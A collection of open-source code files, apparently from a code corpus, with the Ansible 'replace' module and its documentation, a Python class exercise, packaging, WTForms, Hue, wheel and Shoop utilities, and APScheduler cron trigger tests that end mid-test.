DOCUMENTATION = r'''
---
module: replace
author: Evan Kaufman (@EvanK)
extends_documentation_fragment:
- files
- validate
short_description: Replace all instances of a particular string in a
file using a back-referenced regular expression
description:
- This module will replace all instances of a pattern within a file.
- It is up to the user to maintain idempotence by ensuring that the
same pattern would never match any replacements made.
version_added: "1.6"
options:
path:
description:
- The file to modify.
- Before Ansible 2.3 this option was only usable as I(dest), I(destfile) and I(name).
type: path
required: true
aliases: [ dest, destfile, name ]
regexp:
description:
- The regular expression to look for in the contents of the file.
- Uses Python regular expressions; see
U(http://docs.python.org/2/library/re.html).
- Uses MULTILINE mode, which means C(^) and C($) match the beginning
and end of the file, as well as the beginning and end respectively
of I(each line) of the file.
- Does not use DOTALL, which means the C(.) special character matches
any character I(except newlines). A common mistake is to assume that
a negated character set like C([^#]) will also not match newlines.
- In order to exclude newlines, they must be added to the set like C([^#\n]).
- Note that, as of Ansible 2.0, short form tasks should have any escape
sequences backslash-escaped in order to prevent them being parsed
as string literal escapes. See the examples.
type: str
required: true
replace:
description:
- The string to replace regexp matches.
- May contain backreferences that will get expanded with the regexp capture groups if the regexp matches.
- If not set, matches are removed entirely.
- Backreferences can be used ambiguously like C(\1), or explicitly like C(\g<1>).
type: str
after:
description:
- If specified, only content after this match will be replaced/removed.
- Can be used in combination with C(before).
- Uses Python regular expressions; see
U(http://docs.python.org/2/library/re.html).
- Uses DOTALL, which means the C(.) special character I(can match newlines).
type: str
version_added: "2.4"
before:
description:
- If specified, only content before this match will be replaced/removed.
- Can be used in combination with C(after).
- Uses Python regular expressions; see
U(http://docs.python.org/2/library/re.html).
- Uses DOTALL, which means the C(.) special character I(can match newlines).
type: str
version_added: "2.4"
backup:
description:
- Create a backup file including the timestamp information so you can
get the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
others:
description:
- All arguments accepted by the M(file) module also work here.
type: str
encoding:
description:
- The character encoding for reading and writing the file.
type: str
default: utf-8
version_added: "2.4"
notes:
- As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well.
- As of Ansible 2.7.10, the combined use of I(before) and I(after) works properly. If you were relying on the
previous incorrect behavior, you may be need to adjust your tasks.
See U(https://github.com/ansible/ansible/issues/31354) for details.
- Option I(follow) has been removed in Ansible 2.5, because this module modifies the contents of the file so I(follow=no) doesn't make sense.
'''
EXAMPLES = r'''
- name: Before Ansible 2.3, option 'dest', 'destfile' or 'name' was used instead of 'path'
replace:
path: /etc/hosts
regexp: '(\s+)old\.host\.name(\s+.*)?$'
replace: '\1new.host.name\2'
- name: Replace after the expression till the end of the file (requires Ansible >= 2.4)
replace:
path: /etc/apache2/sites-available/default.conf
after: 'NameVirtualHost [*]'
regexp: '^(.+)$'
replace: '# \1'
- name: Replace before the expression till the begin of the file (requires Ansible >= 2.4)
replace:
path: /etc/apache2/sites-available/default.conf
before: '# live site config'
regexp: '^(.+)$'
replace: '# \1'
# Prior to Ansible 2.7.10, using before and after in combination did the opposite of what was intended.
# see https://github.com/ansible/ansible/issues/31354 for details.
- name: Replace between the expressions (requires Ansible >= 2.4)
replace:
path: /etc/hosts
after: '<VirtualHost [*]>'
before: '</VirtualHost>'
regexp: '^(.+)$'
replace: '# \1'
- name: Supports common file attributes
replace:
path: /home/jdoe/.ssh/known_hosts
regexp: '^old\.host\.name[^\n]*\n'
owner: jdoe
group: jdoe
mode: '0644'
- name: Supports a validate command
replace:
path: /etc/apache/ports
regexp: '^(NameVirtualHost|Listen)\s+80\s*$'
replace: '\1 127.0.0.1:8080'
validate: '/usr/sbin/apache2ctl -f %s -t'
- name: Short form task (in ansible 2+) necessitates backslash-escaped sequences
replace: path=/etc/hosts regexp='\\b(localhost)(\\d*)\\b' replace='\\1\\2.localdomain\\2 \\1\\2'
- name: Long form task does not
replace:
path: /etc/hosts
regexp: '\b(localhost)(\d*)\b'
replace: '\1\2.localdomain\2 \1\2'
- name: Explicitly specifying positional matched groups in replacement
replace:
path: /etc/ssh/sshd_config
regexp: '^(ListenAddress[ ]+)[^\n]+$'
replace: '\g<1>0.0.0.0'
- name: Explicitly specifying named matched groups
replace:
path: /etc/ssh/sshd_config
regexp: '^(?P<dctv>ListenAddress[ ]+)(?P<host>[^\n]+)$'
replace: '#\g<dctv>\g<host>\n\g<dctv>0.0.0.0'
'''
import os
import re
import tempfile
from ansible.module_utils._text import to_text, to_bytes
from ansible.module_utils.basic import AnsibleModule
def write_changes(module, contents, path):
tmpfd, tmpfile = tempfile.mkstemp(dir=module.tmpdir)
f = os.fdopen(tmpfd, 'wb')
f.write(contents)
f.close()
validate = module.params.get('validate', None)
valid = not validate
if validate:
if "%s" not in validate:
module.fail_json(msg="validate must contain %%s: %s" % (validate))
(rc, out, err) = module.run_command(validate % tmpfile)
valid = rc == 0
if rc != 0:
module.fail_json(msg='failed to validate: '
'rc:%s error:%s' % (rc, err))
if valid:
module.atomic_move(tmpfile, path, unsafe_writes=module.params['unsafe_writes'])
def check_file_attrs(module, changed, message):
file_args = module.load_file_common_arguments(module.params)
if module.set_file_attributes_if_different(file_args, False):
if changed:
message += " and "
changed = True
message += "ownership, perms or SE linux context changed"
return message, changed
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(type='path', required=True, aliases=['dest', 'destfile', 'name']),
regexp=dict(type='str', required=True),
replace=dict(type='str', default=''),
after=dict(type='str'),
before=dict(type='str'),
backup=dict(type='bool', default=False),
validate=dict(type='str'),
encoding=dict(type='str', default='utf-8'),
),
add_file_common_args=True,
supports_check_mode=True,
)
params = module.params
path = params['path']
encoding = params['encoding']
res_args = dict()
params['after'] = to_text(params['after'], errors='surrogate_or_strict', nonstring='passthru')
params['before'] = to_text(params['before'], errors='surrogate_or_strict', nonstring='passthru')
params['regexp'] = to_text(params['regexp'], errors='surrogate_or_strict', nonstring='passthru')
params['replace'] = to_text(params['replace'], errors='surrogate_or_strict', nonstring='passthru')
if os.path.isdir(path):
module.fail_json(rc=256, msg='Path %s is a directory !' % path)
if not os.path.exists(path):
module.fail_json(rc=257, msg='Path %s does not exist !' % path)
else:
f = open(path, 'rb')
contents = to_text(f.read(), errors='surrogate_or_strict', encoding=encoding)
f.close()
pattern = u''
if params['after'] and params['before']:
pattern = u'%s(?P<subsection>.*?)%s' % (params['after'], params['before'])
elif params['after']:
pattern = u'%s(?P<subsection>.*)' % params['after']
elif params['before']:
pattern = u'(?P<subsection>.*)%s' % params['before']
if pattern:
section_re = re.compile(pattern, re.DOTALL)
match = re.search(section_re, contents)
if match:
section = match.group('subsection')
indices = [match.start('subsection'), match.end('subsection')]
else:
res_args['msg'] = 'Pattern for before/after params did not match the given file: %s' % pattern
res_args['changed'] = False
module.exit_json(**res_args)
else:
section = contents
mre = re.compile(params['regexp'], re.MULTILINE)
result = re.subn(mre, params['replace'], section, 0)
if result[1] > 0 and section != result[0]:
if pattern:
result = (contents[:indices[0]] + result[0] + contents[indices[1]:], result[1])
msg = '%s replacements made' % result[1]
changed = True
if module._diff:
res_args['diff'] = {
'before_header': path,
'before': contents,
'after_header': path,
'after': result[0],
}
else:
msg = ''
changed = False
if changed and not module.check_mode:
if params['backup'] and os.path.exists(path):
res_args['backup_file'] = module.backup_local(path)
# We should always follow symlinks so that we change the real file
path = os.path.realpath(path)
write_changes(module, to_bytes(result[0], encoding=encoding), path)
res_args['msg'], res_args['changed'] = check_file_attrs(module, changed, msg)
module.exit_json(**res_args)
if __name__ == '__main__':
main()
| gpl-3.0 |
FigNewtons/google-python-exercises | logpuzzle/logpuzzle.py | 147 | 1564 | #!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import os
import re
import sys
import urllib
"""Logpuzzle exercise
Given an apache logfile, find the puzzle urls and download the images.
Here's what a puzzle url looks like:
10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] "GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0" 302 528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
"""
def read_urls(filename):
"""Returns a list of the puzzle urls from the given log file,
extracting the hostname from the filename itself.
Screens out duplicate urls and returns the urls sorted into
increasing order."""
# +++your code here+++
def download_images(img_urls, dest_dir):
"""Given the urls already in the correct order, downloads
each image into the given directory.
Gives the images local filenames img0, img1, and so on.
Creates an index.html in the directory
with an img tag to show each local image file.
Creates the directory if necessary.
"""
# +++your code here+++
def main():
args = sys.argv[1:]
if not args:
print 'usage: [--todir dir] logfile '
sys.exit(1)
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
img_urls = read_urls(args[0])
if todir:
download_images(img_urls, todir)
else:
print '\n'.join(img_urls)
if __name__ == '__main__':
main()
| apache-2.0 |
biodrone/plex-desk | desk/flask/lib/python3.4/site-packages/pkg_resources/_vendor/packaging/_structures.py | 906 | 1809 | # Copyright 2014 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
class Infinity(object):
def __repr__(self):
return "Infinity"
def __hash__(self):
return hash(repr(self))
def __lt__(self, other):
return False
def __le__(self, other):
return False
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not isinstance(other, self.__class__)
def __gt__(self, other):
return True
def __ge__(self, other):
return True
def __neg__(self):
return NegativeInfinity
Infinity = Infinity()
class NegativeInfinity(object):
def __repr__(self):
return "-Infinity"
def __hash__(self):
return hash(repr(self))
def __lt__(self, other):
return True
def __le__(self, other):
return True
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not isinstance(other, self.__class__)
def __gt__(self, other):
return False
def __ge__(self, other):
return False
def __neg__(self):
return Infinity
NegativeInfinity = NegativeInfinity()
| mit |
zding5/Microblog-Flask | flask/lib/python2.7/site-packages/wtforms/ext/appengine/fields.py | 177 | 7574 | from __future__ import unicode_literals
import decimal
import operator
from wtforms import fields, widgets
from wtforms.compat import text_type, string_types
class ReferencePropertyField(fields.SelectFieldBase):
"""
A field for ``db.ReferenceProperty``. The list items are rendered in a
select.
:param reference_class:
A db.Model class which will be used to generate the default query
to make the list of items. If this is not specified, The `query`
property must be overridden before validation.
:param get_label:
If a string, use this attribute on the model class as the label
associated with each option. If a one-argument callable, this callable
will be passed model instance and expected to return the label text.
Otherwise, the model object's `__str__` or `__unicode__` will be used.
:param allow_blank:
If set to true, a blank choice will be added to the top of the list
to allow `None` to be chosen.
:param blank_text:
Use this to override the default blank option's label.
"""
widget = widgets.Select()
def __init__(self, label=None, validators=None, reference_class=None,
get_label=None, allow_blank=False,
blank_text='', **kwargs):
super(ReferencePropertyField, self).__init__(label, validators,
**kwargs)
if get_label is None:
self.get_label = lambda x: x
elif isinstance(get_label, string_types):
self.get_label = operator.attrgetter(get_label)
else:
self.get_label = get_label
self.allow_blank = allow_blank
self.blank_text = blank_text
self._set_data(None)
if reference_class is not None:
self.query = reference_class.all()
def _get_data(self):
if self._formdata is not None:
for obj in self.query:
if str(obj.key()) == self._formdata:
self._set_data(obj)
break
return self._data
def _set_data(self, data):
self._data = data
self._formdata = None
data = property(_get_data, _set_data)
def iter_choices(self):
if self.allow_blank:
yield ('__None', self.blank_text, self.data is None)
for obj in self.query:
key = str(obj.key())
label = self.get_label(obj)
yield (key, label, (self.data.key() == obj.key()) if self.data else False)
def process_formdata(self, valuelist):
if valuelist:
if valuelist[0] == '__None':
self.data = None
else:
self._data = None
self._formdata = valuelist[0]
def pre_validate(self, form):
if not self.allow_blank or self.data is not None:
for obj in self.query:
if str(self.data.key()) == str(obj.key()):
break
else:
raise ValueError(self.gettext('Not a valid choice'))
class KeyPropertyField(fields.SelectFieldBase):
"""
A field for ``ndb.KeyProperty``. The list items are rendered in a select.
:param reference_class:
A db.Model class which will be used to generate the default query
to make the list of items. If this is not specified, The `query`
property must be overridden before validation.
:param get_label:
If a string, use this attribute on the model class as the label
associated with each option. If a one-argument callable, this callable
will be passed model instance and expected to return the label text.
Otherwise, the model object's `__str__` or `__unicode__` will be used.
:param allow_blank:
If set to true, a blank choice will be added to the top of the list
to allow `None` to be chosen.
:param blank_text:
Use this to override the default blank option's label.
"""
widget = widgets.Select()
def __init__(self, label=None, validators=None, reference_class=None,
get_label=None, allow_blank=False, blank_text='', **kwargs):
super(KeyPropertyField, self).__init__(label, validators, **kwargs)
if get_label is None:
self.get_label = lambda x: x
elif isinstance(get_label, basestring):
self.get_label = operator.attrgetter(get_label)
else:
self.get_label = get_label
self.allow_blank = allow_blank
self.blank_text = blank_text
self._set_data(None)
if reference_class is not None:
self.query = reference_class.query()
def _get_data(self):
if self._formdata is not None:
for obj in self.query:
if str(obj.key.id()) == self._formdata:
self._set_data(obj)
break
return self._data
def _set_data(self, data):
self._data = data
self._formdata = None
data = property(_get_data, _set_data)
def iter_choices(self):
if self.allow_blank:
yield ('__None', self.blank_text, self.data is None)
for obj in self.query:
key = str(obj.key.id())
label = self.get_label(obj)
yield (key, label, (self.data.key == obj.key) if self.data else False)
def process_formdata(self, valuelist):
if valuelist:
if valuelist[0] == '__None':
self.data = None
else:
self._data = None
self._formdata = valuelist[0]
def pre_validate(self, form):
if self.data is not None:
for obj in self.query:
if self.data.key == obj.key:
break
else:
raise ValueError(self.gettext('Not a valid choice'))
elif not self.allow_blank:
raise ValueError(self.gettext('Not a valid choice'))
class StringListPropertyField(fields.TextAreaField):
"""
A field for ``db.StringListProperty``. The list items are rendered in a
textarea.
"""
def _value(self):
if self.raw_data:
return self.raw_data[0]
else:
return self.data and text_type("\n".join(self.data)) or ''
def process_formdata(self, valuelist):
if valuelist:
try:
self.data = valuelist[0].splitlines()
except ValueError:
raise ValueError(self.gettext('Not a valid list'))
class IntegerListPropertyField(fields.TextAreaField):
"""
A field for ``db.StringListProperty``. The list items are rendered in a
textarea.
"""
def _value(self):
if self.raw_data:
return self.raw_data[0]
else:
return text_type('\n'.join(self.data)) if self.data else ''
def process_formdata(self, valuelist):
if valuelist:
try:
self.data = [int(value) for value in valuelist[0].splitlines()]
except ValueError:
raise ValueError(self.gettext('Not a valid integer list'))
class GeoPtPropertyField(fields.TextField):
def process_formdata(self, valuelist):
if valuelist:
try:
lat, lon = valuelist[0].split(',')
self.data = '%s,%s' % (decimal.Decimal(lat.strip()), decimal.Decimal(lon.strip()),)
except (decimal.InvalidOperation, ValueError):
raise ValueError('Not a valid coordinate location')
| mit |
xq262144/hue | apps/useradmin/src/useradmin/migrations/0003_remove_metastore_readonly_huepermission.py | 37 | 5620 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
from useradmin.models import HuePermission
try:
perm = HuePermission.objects.get(app='metastore', action='read_only_access')
perm.delete()
except HuePermission.DoesNotExist:
pass
def backwards(self, orm):
perm, created = HuePermission.objects.get_or_create(app='metastore', action='read_only_access')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'useradmin.grouppermission': {
'Meta': {'object_name': 'GroupPermission'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.Group']"}),
'hue_permission': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['useradmin.HuePermission']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'useradmin.huepermission': {
'Meta': {'object_name': 'HuePermission'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'app': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'through': "orm['useradmin.GroupPermission']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'useradmin.ldapgroup': {
'Meta': {'object_name': 'LdapGroup'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'group'", 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'useradmin.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'creation_method': ('django.db.models.fields.CharField', [], {'default': "'HUE'", 'max_length': '64'}),
'home_directory': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['useradmin']
symmetrical = True
| apache-2.0 |
SantosDevelopers/sborganicos | venv/lib/python3.5/site-packages/wheel/util.py | 345 | 4890 | """Utility functions."""
import sys
import os
import base64
import json
import hashlib
try:
from collections import OrderedDict
except ImportError:
OrderedDict = dict
__all__ = ['urlsafe_b64encode', 'urlsafe_b64decode', 'utf8',
'to_json', 'from_json', 'matches_requirement']
def urlsafe_b64encode(data):
"""urlsafe_b64encode without padding"""
return base64.urlsafe_b64encode(data).rstrip(binary('='))
def urlsafe_b64decode(data):
"""urlsafe_b64decode without padding"""
pad = b'=' * (4 - (len(data) & 3))
return base64.urlsafe_b64decode(data + pad)
def to_json(o):
'''Convert given data to JSON.'''
return json.dumps(o, sort_keys=True)
def from_json(j):
'''Decode a JSON payload.'''
return json.loads(j)
def open_for_csv(name, mode):
if sys.version_info[0] < 3:
nl = {}
bin = 'b'
else:
nl = { 'newline': '' }
bin = ''
return open(name, mode + bin, **nl)
try:
unicode
def utf8(data):
'''Utf-8 encode data.'''
if isinstance(data, unicode):
return data.encode('utf-8')
return data
except NameError:
def utf8(data):
'''Utf-8 encode data.'''
if isinstance(data, str):
return data.encode('utf-8')
return data
try:
# For encoding ascii back and forth between bytestrings, as is repeatedly
# necessary in JSON-based crypto under Python 3
unicode
def native(s):
return s
def binary(s):
if isinstance(s, unicode):
return s.encode('ascii')
return s
except NameError:
def native(s):
if isinstance(s, bytes):
return s.decode('ascii')
return s
def binary(s):
if isinstance(s, str):
return s.encode('ascii')
class HashingFile(object):
def __init__(self, fd, hashtype='sha256'):
self.fd = fd
self.hashtype = hashtype
self.hash = hashlib.new(hashtype)
self.length = 0
def write(self, data):
self.hash.update(data)
self.length += len(data)
self.fd.write(data)
def close(self):
self.fd.close()
def digest(self):
if self.hashtype == 'md5':
return self.hash.hexdigest()
digest = self.hash.digest()
return self.hashtype + '=' + native(urlsafe_b64encode(digest))
class OrderedDefaultDict(OrderedDict):
def __init__(self, *args, **kwargs):
if not args:
self.default_factory = None
else:
if not (args[0] is None or callable(args[0])):
raise TypeError('first argument must be callable or None')
self.default_factory = args[0]
args = args[1:]
super(OrderedDefaultDict, self).__init__(*args, **kwargs)
def __missing__ (self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = default = self.default_factory()
return default
if sys.platform == 'win32':
import ctypes.wintypes
# CSIDL_APPDATA for reference - not used here for compatibility with
# dirspec, which uses LOCAL_APPDATA and COMMON_APPDATA in that order
csidl = dict(CSIDL_APPDATA=26, CSIDL_LOCAL_APPDATA=28,
CSIDL_COMMON_APPDATA=35)
def get_path(name):
SHGFP_TYPE_CURRENT = 0
buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
ctypes.windll.shell32.SHGetFolderPathW(0, csidl[name], 0, SHGFP_TYPE_CURRENT, buf)
return buf.value
def save_config_path(*resource):
appdata = get_path("CSIDL_LOCAL_APPDATA")
path = os.path.join(appdata, *resource)
if not os.path.isdir(path):
os.makedirs(path)
return path
def load_config_paths(*resource):
ids = ["CSIDL_LOCAL_APPDATA", "CSIDL_COMMON_APPDATA"]
for id in ids:
base = get_path(id)
path = os.path.join(base, *resource)
if os.path.exists(path):
yield path
else:
def save_config_path(*resource):
import xdg.BaseDirectory
return xdg.BaseDirectory.save_config_path(*resource)
def load_config_paths(*resource):
import xdg.BaseDirectory
return xdg.BaseDirectory.load_config_paths(*resource)
def matches_requirement(req, wheels):
"""List of wheels matching a requirement.
:param req: The requirement to satisfy
:param wheels: List of wheels to search.
"""
try:
from pkg_resources import Distribution, Requirement
except ImportError:
raise RuntimeError("Cannot use requirements without pkg_resources")
req = Requirement.parse(req)
selected = []
for wf in wheels:
f = wf.parsed_filename
dist = Distribution(project_name=f.group("name"), version=f.group("ver"))
if dist in req:
selected.append(wf)
return selected
| mit |
jacobsenanaizabel/shoop | shoop/core/fields/tagged_json.py | 6 | 3235 | # This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
"""
"Tagged JSON" encoder/decoder.
Objects that are normally not unambiguously representable via JSON
are encoded into special objects of the form `{tag: val}`; the encoding
and decoding process can be customized however necessary.
"""
from __future__ import unicode_literals
import datetime
import decimal
from enum import Enum
import django.utils.dateparse as dateparse
from django.core.exceptions import ImproperlyConfigured
from django.utils import six
from jsonfield.encoder import JSONEncoder
from six import text_type
from shoop.utils.importing import load
from shoop.utils.iterables import first
isoformat = lambda obj: obj.isoformat()
def encode_enum(enum_val):
enum_cls = enum_val.__class__
spec = "%s:%s" % (enum_cls.__module__, enum_cls.__name__)
try:
if load(spec) != enum_cls:
raise ImproperlyConfigured("That's not the same class!")
except ImproperlyConfigured: # Also raised by `load`
return enum_val.value # Fall back to the bare value.
return [spec, enum_val.value]
def decode_enum(val):
spec, value = val
cls = load(spec)
if issubclass(cls, Enum):
return cls(value)
return value # Fall back to the bare value. Not optimal, I know.
class TagRegistry(object):
def __init__(self):
self.tags = {}
def register(self, tag, classes, encoder=text_type, decoder=None):
if decoder is None:
if isinstance(classes, (list, tuple)):
decoder = classes[0]
else:
decoder = classes
if not callable(decoder):
raise ValueError("Decoder %r for tag %r is not callable" % (decoder, tag))
if not callable(encoder):
raise ValueError("Encoder %r for tag %r is not callable" % (encoder, tag))
self.tags[tag] = {
"classes": classes,
"encoder": encoder,
"decoder": decoder
}
def encode(self, obj, default):
for tag, info in six.iteritems(self.tags):
if isinstance(obj, info["classes"]):
return {tag: info["encoder"](obj)}
return default(obj)
def decode(self, obj):
if len(obj) == 1:
tag, val = first(obj.items())
info = self.tags.get(tag)
if info:
return info["decoder"](val)
return obj
#: The default tag registry.
tag_registry = TagRegistry()
tag_registry.register("$datetime", datetime.datetime, encoder=isoformat, decoder=dateparse.parse_datetime)
tag_registry.register("$date", datetime.date, encoder=isoformat, decoder=dateparse.parse_date)
tag_registry.register("$time", datetime.time, encoder=isoformat, decoder=dateparse.parse_time)
tag_registry.register("$dec", decimal.Decimal)
tag_registry.register("$enum", Enum, encoder=encode_enum, decoder=decode_enum)
class TaggedJSONEncoder(JSONEncoder):
registry = tag_registry
def default(self, obj):
return self.registry.encode(obj, super(JSONEncoder, self).default)
| agpl-3.0 |
noushi/apscheduler | tests/test_triggers.py | 1 | 15693 | from datetime import datetime, timedelta
import pytest
import pytz
from apscheduler.triggers.cron import CronTrigger
from apscheduler.triggers.date import DateTrigger
from apscheduler.triggers.interval import IntervalTrigger
class TestCronTrigger(object):
def test_cron_trigger_1(self, timezone):
trigger = CronTrigger(year='2009/2', month='1/3', day='5-13', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009/2', month='1/3', day='5-13')>"
assert str(trigger) == "cron[year='2009/2', month='1/3', day='5-13']"
start_date = timezone.localize(datetime(2008, 12, 1))
correct_next_date = timezone.localize(datetime(2009, 1, 5))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_trigger_2(self, timezone):
trigger = CronTrigger(year='2009/2', month='1/3', day='5-13', timezone=timezone)
start_date = timezone.localize(datetime(2009, 10, 14))
correct_next_date = timezone.localize(datetime(2011, 1, 5))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_trigger_3(self, timezone):
trigger = CronTrigger(year='2009', month='2', hour='8-10', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='2', hour='8-10')>"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 2, 1, 8))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_trigger_4(self, timezone):
trigger = CronTrigger(year='2012', month='2', day='last', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2012', month='2', day='last')>"
start_date = timezone.localize(datetime(2012, 2, 1))
correct_next_date = timezone.localize(datetime(2012, 2, 29))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_zero_value(self, timezone):
trigger = CronTrigger(year=2009, month=2, hour=0, timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='2', hour='0')>"
def test_cron_year_list(self, timezone):
trigger = CronTrigger(year='2009,2008', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009,2008')>"
assert str(trigger) == "cron[year='2009,2008']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 1, 1))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_start_date(self, timezone):
trigger = CronTrigger(year='2009', month='2', hour='8-10', start_date='2009-02-03 11:00:00', timezone=timezone)
assert repr(trigger) == \
"<CronTrigger (year='2009', month='2', hour='8-10', start_date='2009-02-03 11:00:00 CET')>"
assert str(trigger) == "cron[year='2009', month='2', hour='8-10']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 2, 4, 8))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_weekday_overlap(self, timezone):
trigger = CronTrigger(year=2009, month=1, day='6-10', day_of_week='2-4', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='1', day='6-10', day_of_week='2-4')>"
assert str(trigger) == "cron[year='2009', month='1', day='6-10', day_of_week='2-4']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 1, 7))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_weekday_nomatch(self, timezone):
trigger = CronTrigger(year=2009, month=1, day='6-10', day_of_week='0,6', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='1', day='6-10', day_of_week='0,6')>"
assert str(trigger) == "cron[year='2009', month='1', day='6-10', day_of_week='0,6']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = None
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_weekday_positional(self, timezone):
trigger = CronTrigger(year=2009, month=1, day='4th wed', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='1', day='4th wed')>"
assert str(trigger) == "cron[year='2009', month='1', day='4th wed']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 1, 28))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_week_1(self, timezone):
trigger = CronTrigger(year=2009, month=2, week=8, timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='2', week='8')>"
assert str(trigger) == "cron[year='2009', month='2', week='8']"
start_date = timezone.localize(datetime(2009, 1, 1))
